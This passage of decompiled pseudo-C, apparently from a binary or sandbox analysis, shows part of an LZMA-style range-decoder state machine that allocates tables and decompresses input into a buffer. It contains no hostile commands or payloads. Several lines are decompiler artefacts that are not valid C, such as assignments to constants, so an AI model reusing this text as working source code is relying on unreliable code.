						 *(__eax + __edx) = __cl;
						__eax = __eax + 1;
						__edx = 0;
						_t274 = __eax %  *(__ebp - 0x74);
						__eax = __eax /  *(__ebp - 0x74);
						__edx = _t274;
						__eax =  *(__ebp - 0x68);
						 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
						 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
						_t283 = __ebp - 0x64;
						 *_t283 =  *(__ebp - 0x64) - 1;
						 *( *(__ebp - 0x68)) = __cl;
						L79:
						 *(__ebp - 0x14) = __edx;
						L80:
						 *(__ebp - 0x88) = 2;
					}
					L1:
					_t535 =  *(_t613 - 0x88);
					if(_t535 > 0x1c) {
						goto L171;
					}
					switch( *((intOrPtr*)(_t535 * 4 +  &M004071C8))) {
						case 0:
							if( *(_t613 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t535 =  *( *(_t613 - 0x70));
							if(_t535 > 0xe1) {
								goto L171;
							}
							_t539 = _t535 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t609 = _t539 / _t570;
							_t541 = _t539 % _t570 & 0x000000ff;
							asm("cdq");
							_t604 = _t541 % _t571 & 0x000000ff;
							 *(_t613 - 0x3c) = _t604;
							 *(_t613 - 0x1c) = (1 << _t609) - 1;
							 *((intOrPtr*)(_t613 - 0x18)) = (1 << _t541 / _t571) - 1;
							_t612 = (0x300 << _t604 + _t609) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t613 - 0x78))) {
								L10:
								if(_t612 == 0) {
									L12:
									 *(_t613 - 0x48) =  *(_t613 - 0x48) & 0x00000000;
									 *(_t613 - 0x40) =  *(_t613 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t612 = _t612 - 1;
									 *((short*)( *(_t613 - 4) + _t612 * 2)) = 0x400;
								} while (_t612 != 0);
								goto L12;
							}
							if( *(_t613 - 4) != 0) {
								GlobalFree( *(_t613 - 4));
							}
							_t535 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t613 - 4) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t613 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 1;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							 *(_t613 - 0x40) =  *(_t613 - 0x40) | ( *( *(_t613 - 0x70)) & 0x000000ff) <<  *(_t613 - 0x48) << 0x00000003;
							 *(_t613 - 0x70) =  &(( *(_t613 - 0x70))[1]);
							_t45 = _t613 - 0x48;
							 *_t45 =  *(_t613 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t613 - 0x48) < 4) {
								goto L13;
							}
							_t547 =  *(_t613 - 0x40);
							if(_t547 ==  *(_t613 - 0x74)) {
								L20:
								 *(_t613 - 0x48) = 5;
								 *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) =  *( *(_t613 - 8) +  *(_t613 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t613 - 0x74) = _t547;
							if( *(_t613 - 8) != 0) {
								GlobalFree( *(_t613 - 8));
							}
							_t535 = GlobalAlloc(0x40,  *(_t613 - 0x40)); // executed
							 *(_t613 - 8) = _t535;
							if(_t535 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t554 =  *(_t613 - 0x60) &  *(_t613 - 0x1c);
							 *(_t613 - 0x84) = 6;
							 *(_t613 - 0x4c) = _t554;
							_t606 =  *(_t613 - 4) + (( *(_t613 - 0x38) << 4) + _t554) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t613 - 0x6c);
							if( *(_t613 - 0x6c) == 0) {
								 *(_t613 - 0x88) = 3;
								goto L170;
							}
							 *(_t613 - 0x6c) =  *(_t613 - 0x6c) - 1;
							_t67 = _t613 - 0x70;
							 *_t67 =  &(( *(_t613 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t613 - 0xc) =  *(_t613 - 0xc) << 0x00000008 |  *( *(_t613 - 0x70)) & 0x000000ff;
							L23:
							 *(_t613 - 0x48) =  *(_t613 - 0x48) - 1;
							if( *(_t613 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							__edx = 0;
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x34) = 1;
								 *(__ebp - 0x84) = 7;
								__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x5c) & 0x000000ff;
							__esi =  *(__ebp - 0x60);
							__cl = 8;
							__cl = 8 -  *(__ebp - 0x3c);
							__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
							__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
							__ecx =  *(__ebp - 0x3c);
							__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
							__ecx =  *(__ebp - 4);
							(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
							__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
							__eflags =  *(__ebp - 0x38) - 4;
							__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
							if( *(__ebp - 0x38) >= 4) {
								__eflags =  *(__ebp - 0x38) - 0xa;
								if( *(__ebp - 0x38) >= 0xa) {
									_t98 = __ebp - 0x38;
									 *_t98 =  *(__ebp - 0x38) - 6;
									__eflags =  *_t98;
								} else {
									 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
								}
							} else {
								 *(__ebp - 0x38) = 0;
							}
							__eflags =  *(__ebp - 0x34) - __edx;
							if( *(__ebp - 0x34) == __edx) {
								__ebx = 0;
								__ebx = 1;
								goto L61;
							} else {
								__eax =  *(__ebp - 0x14);
								__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
								__eflags = __eax -  *(__ebp - 0x74);
								if(__eax >=  *(__ebp - 0x74)) {
									__eax = __eax +  *(__ebp - 0x74);
									__eflags = __eax;
								}
								__ecx =  *(__ebp - 8);
								__ebx = 0;
								__ebx = 1;
								__al =  *((intOrPtr*)(__eax + __ecx));
								 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
								goto L41;
							}
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L69;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
							__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
							goto L132;
						case 8:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xa;
								__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
							} else {
								__eax =  *(__ebp - 0x38);
								__ecx =  *(__ebp - 4);
								__eax =  *(__ebp - 0x38) + 0xf;
								 *(__ebp - 0x84) = 9;
								 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
								__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
							}
							goto L132;
						case 9:
							goto L0;
						case 0xa:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 4);
								__ecx =  *(__ebp - 0x38);
								 *(__ebp - 0x84) = 0xb;
								__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x28);
							goto L88;
						case 0xb:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__ecx =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x20);
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
							} else {
								__eax =  *(__ebp - 0x24);
							}
							__ecx =  *(__ebp - 0x28);
							 *(__ebp - 0x24) =  *(__ebp - 0x28);
							L88:
							__ecx =  *(__ebp - 0x2c);
							 *(__ebp - 0x2c) = __eax;
							 *(__ebp - 0x28) =  *(__ebp - 0x2c);
							goto L89;
						case 0xc:
							L99:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xc;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t334 = __ebp - 0x70;
							 *_t334 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t334;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							__eax =  *(__ebp - 0x2c);
							goto L101;
						case 0xd:
							L37:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xd;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t122 = __ebp - 0x70;
							 *_t122 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t122;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L39:
							__eax =  *(__ebp - 0x40);
							__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
							if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
								goto L48;
							}
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								goto L54;
							}
							L41:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__eflags = __eax;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L39;
							} else {
								goto L37;
							}
						case 0xe:
							L46:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xe;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t156 = __ebp - 0x70;
							 *_t156 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t156;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							while(1) {
								L48:
								__eflags = __ebx - 0x100;
								if(__ebx >= 0x100) {
									break;
								}
								__eax =  *(__ebp - 0x58);
								__edx = __ebx + __ebx;
								__ecx =  *(__ebp - 0x10);
								__esi = __edx + __eax;
								__ecx =  *(__ebp - 0x10) >> 0xb;
								__ax =  *__esi;
								 *(__ebp - 0x54) = __esi;
								__edi = __ax & 0x0000ffff;
								__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
								__eflags =  *(__ebp - 0xc) - __ecx;
								if( *(__ebp - 0xc) >= __ecx) {
									 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
									 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
									__cx = __ax;
									_t170 = __edx + 1; // 0x1
									__ebx = _t170;
									__cx = __ax >> 5;
									__eflags = __eax;
									 *__esi = __ax;
								} else {
									 *(__ebp - 0x10) = __ecx;
									0x800 = 0x800 - __edi;
									0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
									__ebx = __ebx + __ebx;
									 *__esi = __cx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0x10) >= 0x1000000) {
									continue;
								} else {
									goto L46;
								}
							}
							L54:
							_t173 = __ebp - 0x34;
							 *_t173 =  *(__ebp - 0x34) & 0x00000000;
							__eflags =  *_t173;
							goto L55;
						case 0xf:
							L58:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0xf;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t203 = __ebp - 0x70;
							 *_t203 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t203;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L60:
							__eflags = __ebx - 0x100;
							if(__ebx >= 0x100) {
								L55:
								__al =  *(__ebp - 0x44);
								 *(__ebp - 0x5c) =  *(__ebp - 0x44);
								goto L56;
							}
							L61:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t217 = __edx + 1; // 0x1
								__ebx = _t217;
								__cx = __ax >> 5;
								__eflags = __eax;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L60;
							} else {
								goto L58;
							}
						case 0x10:
							L109:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x10;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t365 = __ebp - 0x70;
							 *_t365 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t365;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							goto L111;
						case 0x11:
							goto L69;
						case 0x12:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								__eax =  *(__ebp - 0x58);
								 *(__ebp - 0x84) = 0x13;
								__esi =  *(__ebp - 0x58) + 2;
								goto L132;
							}
							__eax =  *(__ebp - 0x4c);
							 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							__eflags = __eax;
							__eax =  *(__ebp - 0x58) + __eax + 4;
							goto L130;
						case 0x13:
							__eflags =  *(__ebp - 0x40);
							if( *(__ebp - 0x40) != 0) {
								_t469 = __ebp - 0x58;
								 *_t469 =  *(__ebp - 0x58) + 0x204;
								__eflags =  *_t469;
								 *(__ebp - 0x30) = 0x10;
								 *(__ebp - 0x40) = 8;
								L144:
								 *(__ebp - 0x7c) = 0x14;
								goto L145;
							}
							__eax =  *(__ebp - 0x4c);
							__ecx =  *(__ebp - 0x58);
							__eax =  *(__ebp - 0x4c) << 4;
							 *(__ebp - 0x30) = 8;
							__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
							L130:
							 *(__ebp - 0x58) = __eax;
							 *(__ebp - 0x40) = 3;
							goto L144;
						case 0x14:
							 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
							__eax =  *(__ebp - 0x80);
							goto L140;
						case 0x15:
							__eax = 0;
							__eflags =  *(__ebp - 0x38) - 7;
							0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
							__al = __al & 0x000000fd;
							__eax = (__eflags >= 0) - 1 + 0xb;
							 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
							goto L120;
						case 0x16:
							__eax =  *(__ebp - 0x30);
							__eflags = __eax - 4;
							if(__eax >= 4) {
								_push(3);
								_pop(__eax);
							}
							__ecx =  *(__ebp - 4);
							 *(__ebp - 0x40) = 6;
							__eax = __eax << 7;
							 *(__ebp - 0x7c) = 0x19;
							 *(__ebp - 0x58) = __eax;
							goto L145;
						case 0x17:
							L145:
							__eax =  *(__ebp - 0x40);
							 *(__ebp - 0x50) = 1;
							 *(__ebp - 0x48) =  *(__ebp - 0x40);
							goto L149;
						case 0x18:
							L146:
							__eflags =  *(__ebp - 0x6c);
							if( *(__ebp - 0x6c) == 0) {
								 *(__ebp - 0x88) = 0x18;
								goto L170;
							}
							__ecx =  *(__ebp - 0x70);
							__eax =  *(__ebp - 0xc);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
							__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
							 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
							 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							_t484 = __ebp - 0x70;
							 *_t484 =  *(__ebp - 0x70) + 1;
							__eflags =  *_t484;
							 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
							L148:
							_t487 = __ebp - 0x48;
							 *_t487 =  *(__ebp - 0x48) - 1;
							__eflags =  *_t487;
							L149:
							__eflags =  *(__ebp - 0x48);
							if( *(__ebp - 0x48) <= 0) {
								__ecx =  *(__ebp - 0x40);
								__ebx =  *(__ebp - 0x50);
								0 = 1;
								__eax = 1 << __cl;
								__ebx =  *(__ebp - 0x50) - (1 << __cl);
								__eax =  *(__ebp - 0x7c);
								 *(__ebp - 0x44) = __ebx;
								goto L140;
							}
							__eax =  *(__ebp - 0x50);
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__edx =  *(__ebp - 0x50) +  *(__ebp - 0x50);
							__eax =  *(__ebp - 0x58);
							__esi = __edx + __eax;
							 *(__ebp - 0x54) = __esi;
							__ax =  *__esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							__eflags =  *(__ebp - 0xc) - __ecx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								__cx = __ax >> 5;
								__eax = __eax - __ecx;
								__edx = __edx + 1;
								__eflags = __edx;
								 *__esi = __ax;
								 *(__ebp - 0x50) = __edx;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
								 *__esi = __cx;
							}
							__eflags =  *(__ebp - 0x10) - 0x1000000;
							if( *(__ebp - 0x10) >= 0x1000000) {
								goto L148;
							} else {
								goto L146;
							}
						case 0x19:
							__eflags = __ebx - 4;
							if(__ebx < 4) {
								 *(__ebp - 0x2c) = __ebx;
								L119:
								_t393 = __ebp - 0x2c;
								 *_t393 =  *(__ebp - 0x2c) + 1;
								__eflags =  *_t393;
								L120:
								__eax =  *(__ebp - 0x2c);
								__eflags = __eax;
								if(__eax == 0) {
									 *(__ebp - 0x30) =  *(__ebp - 0x30) | 0xffffffff;
									goto L170;
								}
								__eflags = __eax -  *(__ebp - 0x60);
								if(__eax >  *(__ebp - 0x60)) {
									goto L171;
								}
								 *(__ebp - 0x30) =  *(__ebp - 0x30) + 2;
								__eax =  *(__ebp - 0x30);
								_t400 = __ebp - 0x60;
								 *_t400 =  *(__ebp - 0x60) +  *(__ebp - 0x30);
								__eflags =  *_t400;
								goto L123;
							}
							__ecx = __ebx;
							__eax = __ebx;
							__ecx = __ebx >> 1;
							__eax = __ebx & 0x00000001;
							__ecx = (__ebx >> 1) - 1;
							__al = __al | 0x00000002;
							__eax = (__ebx & 0x00000001) << __cl;
							__eflags = __ebx - 0xe;
							 *(__ebp - 0x2c) = __eax;
							if(__ebx >= 0xe) {
								__ebx = 0;
								 *(__ebp - 0x48) = __ecx;
								L102:
								__eflags =  *(__ebp - 0x48);
								if( *(__ebp - 0x48) <= 0) {
									__eax = __eax + __ebx;
									 *(__ebp - 0x40) = 4;
									 *(__ebp - 0x2c) = __eax;
									__eax =  *(__ebp - 4);
									__eax =  *(__ebp - 4) + 0x644;
									__eflags = __eax;
									L108:
									__ebx = 0;
									 *(__ebp - 0x58) = __eax;
									 *(__ebp - 0x50) = 1;
									 *(__ebp - 0x44) = 0;
									 *(__ebp - 0x48) = 0;
									L112:
									__eax =  *(__ebp - 0x40);
									__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
									if( *(__ebp - 0x48) >=  *(__ebp - 0x40)) {
										_t391 = __ebp - 0x2c;
										 *_t391 =  *(__ebp - 0x2c) + __ebx;
										__eflags =  *_t391;
										goto L119;
									}
									__eax =  *(__ebp - 0x50);
									 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
									__edi =  *(__ebp - 0x50) +  *(__ebp - 0x50);
									__eax =  *(__ebp - 0x58);
									__esi = __edi + __eax;
									 *(__ebp - 0x54) = __esi;
									__ax =  *__esi;
									__ecx = __ax & 0x0000ffff;
									__edx = ( *(__ebp - 0x10) >> 0xb) * __ecx;
									__eflags =  *(__ebp - 0xc) - __edx;
									if( *(__ebp - 0xc) >= __edx) {
										__ecx = 0;
										 *(__ebp - 0x10) =  *(__ebp - 0x10) - __edx;
										__ecx = 1;
										 *(__ebp - 0xc) =  *(__ebp - 0xc) - __edx;
										__ebx = 1;
										__ecx =  *(__ebp - 0x48);
										__ebx = 1 << __cl;
										__ecx = 1 << __cl;
										__ebx =  *(__ebp - 0x44);
										__ebx =  *(__ebp - 0x44) | __ecx;
										__cx = __ax;
										__cx = __ax >> 5;
										__eax = __eax - __ecx;
										__edi = __edi + 1;
										__eflags = __edi;
										 *(__ebp - 0x44) = __ebx;
										 *__esi = __ax;
										 *(__ebp - 0x50) = __edi;
									} else {
										 *(__ebp - 0x10) = __edx;
										0x800 = 0x800 - __ecx;
										0x800 - __ecx >> 5 = (0x800 - __ecx >> 5) + __eax;
										 *(__ebp - 0x50) =  *(__ebp - 0x50) << 1;
										 *__esi = __dx;
									}
									__eflags =  *(__ebp - 0x10) - 0x1000000;
									if( *(__ebp - 0x10) >= 0x1000000) {
										L111:
										_t368 = __ebp - 0x48;
										 *_t368 =  *(__ebp - 0x48) + 1;
										__eflags =  *_t368;
										goto L112;
									} else {
										goto L109;
									}
								}
								__ecx =  *(__ebp - 0xc);
								__ebx = __ebx + __ebx;
								 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 1;
								__eflags =  *(__ebp - 0xc) -  *(__ebp - 0x10);
								 *(__ebp - 0x44) = __ebx;
								if( *(__ebp - 0xc) >=  *(__ebp - 0x10)) {
									__ecx =  *(__ebp - 0x10);
									 *(__ebp - 0xc) =  *(__ebp - 0xc) -  *(__ebp - 0x10);
									__ebx = __ebx | 0x00000001;
									__eflags = __ebx;
									 *(__ebp - 0x44) = __ebx;
								}
								__eflags =  *(__ebp - 0x10) - 0x1000000;
								if( *(__ebp - 0x10) >= 0x1000000) {
									L101:
									_t338 = __ebp - 0x48;
									 *_t338 =  *(__ebp - 0x48) - 1;
									__eflags =  *_t338;
									goto L102;
								} else {
									goto L99;
								}
							}
							__edx =  *(__ebp - 4);
							__eax = __eax - __ebx;
							 *(__ebp - 0x40) = __ecx;
							__eax =  *(__ebp - 4) + 0x55e + __eax * 2;
							goto L108;
						case 0x1a:
							L56:
							__eflags =  *(__ebp - 0x64);
							if( *(__ebp - 0x64) == 0) {
								 *(__ebp - 0x88) = 0x1a;
								goto L170;
							}
							__ecx =  *(__ebp - 0x68);
							__al =  *(__ebp - 0x5c);
							__edx =  *(__ebp - 8);
							 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
							 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
							 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
							 *( *(__ebp - 0x68)) = __al;
							__ecx =  *(__ebp - 0x14);
							 *(__ecx +  *(__ebp - 8)) = __al;
							__eax = __ecx + 1;
							__edx = 0;
							_t192 = __eax %  *(__ebp - 0x74);
							__eax = __eax /  *(__ebp - 0x74);
							__edx = _t192;
							goto L79;
						case 0x1b:
							goto L75;
						case 0x1c:
							while(1) {
								L123:
								__eflags =  *(__ebp - 0x64);
								if( *(__ebp - 0x64) == 0) {
									break;
								}
